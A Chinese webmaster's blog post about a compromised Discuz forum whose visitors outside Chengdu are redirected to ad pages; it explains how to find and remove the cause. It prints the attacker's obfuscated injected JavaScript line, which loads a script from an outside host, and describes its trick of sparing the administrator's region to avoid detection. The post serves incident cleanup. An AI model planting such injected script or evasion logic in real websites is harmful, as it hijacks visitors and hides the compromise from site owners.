当前位置:首页 > 网站运营 > 正文内容

discuz网站被挂马,非管理员访问自动跳转到广告页面 怎么解决

葱子7年前 (2017-04-27)网站运营1759

你是否遇到过你的网站打开一会就自动跳转到其他页面,而且这个问题是你的用户告诉你的,而你自己却没有遇到?

discuz挂马弹出页面

经过葱子我细心的对挂马网站做排查,终于让我找到了问题所在。

挂马者是通过在discuz的头部js文件里面添加了劫持js代码,通过判断访问者的IP来实现不同跳转的。

具体代码如下:

document.write(“<\163”+”cript src=’http://\141”+”d.\172”+”om”+”12\63”+”.n”+”et/i”+”p.asp?l”+”oc=chengdu’><\/s”+”cript>”);

可以看出,后面有个“chengdu”代码,这段代码的意思就是IP为成都地区的访问者在访问被挂马页面时不做跳转。其余地区的IP访问者则跳转。

从这段代码我们就可以看出挂马者是多么的用心险恶。

他首先根据你网站所在地进行判断网站管理员经常使用的IP地址所在地,然后有针对性的对网站管理员不做跳转劫持。

所以,这种劫持的情况下,网站管理者非常难以发现到网站被挂马了。

解决办法也比较简单:

首先校验下原始文件,对比下哪些js文件近期有被改动过,然后针对被改动过的js文件做以上代码段的排除。找到以上代码段后,删除即可。

最后说一下,各位网站管理者一定要注意保管好网站和服务器的管理密码,尽量设置的复杂一点。同时也要及时检测服务器是否存在漏洞等,及时做针对性处理,以避免类似的事情再发生。

以上文章为向上的葱子原创,转载请注明出处。

原文地址:https://www.aitiancheng.com/article-491.html

扫描二维码推送至手机访问。

版权声明:本文由葱子博客发布,如需转载请注明出处。

本文链接:https://www.aitiancheng.com/article-491.html

相关文章

网站换模板影响收录排名吗

在站长论坛看到有人问网站换模板会不会影响收录排名的问题,很多没有回答到点子上。 会不会影响收录排名:会。 为什么会影响:不建议频繁更新网站前端模板,因为搜索引擎抓取的内容就是你前端网页所呈现的内容。你的网站模板一直未变化,对于搜索引擎来...

iframe高度自适应的一个方法

最近在写网页的时候,遇到一个问题,需要在某个页面下调用另外一个页面做内容展现。 第一想到的就是使用iframe框架来实现。 有个问题就是,目标页面的高度是动态调整的,非固定的。 在网上搜索了下,找个一个不错的解决方法,使用js来...

记录分析我的discuz网站被挂马,快照被劫持的解决过程

就在前几天,我心血来潮检查了下的古玩论坛网站的收录情况,突然发现在各大搜索引擎里面的快照都变成违规信息了。根据我以往的经验,很快判断出是被挂马劫持了快照。 我在之前的文章中给大家讲过挂马后的一些表现,比如在搜索引擎中收录的链接标题都变成了...

葱子的wordpress博客开启https访问了:解决百度分享、畅言无法使用的问题

葱子的wordpress博客开启https访问了:解决百度分享、畅言无法使用的问题

我的博客一直是放在阿里云虚拟主机上面的,今天因为虚拟主机快到期的缘故,将博客转移到了自己的独立ECS服务器上面了。 借着wordpress博客搬家这个机会,一并将博客的https也给开启了。 下面我简单...

亲测有效!2段代码轻松禁止百度转码

亲测有效!2段代码轻松禁止百度转码

不知道各位站长是否有在手机中百度过自己的网站,当你从搜索结果中打开自己网站的时候,是否有发现网站页面似乎和自己本身的界面有点出入? 拉到文章末尾,你会发现一条百度转码声明。 什么是百度转码 百度会将部分未适配移...

windows系统下使用DOS命令行查找含某一字符串的所有文件

使用windows服务器的站长,很多时候也需要对网站文件做下特定的排查。 手工查很不方便,这里可以使用DOS命令来查询。 一、首先使用cmd命令进入网站文件夹: 比如你要查找的文件夹在...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。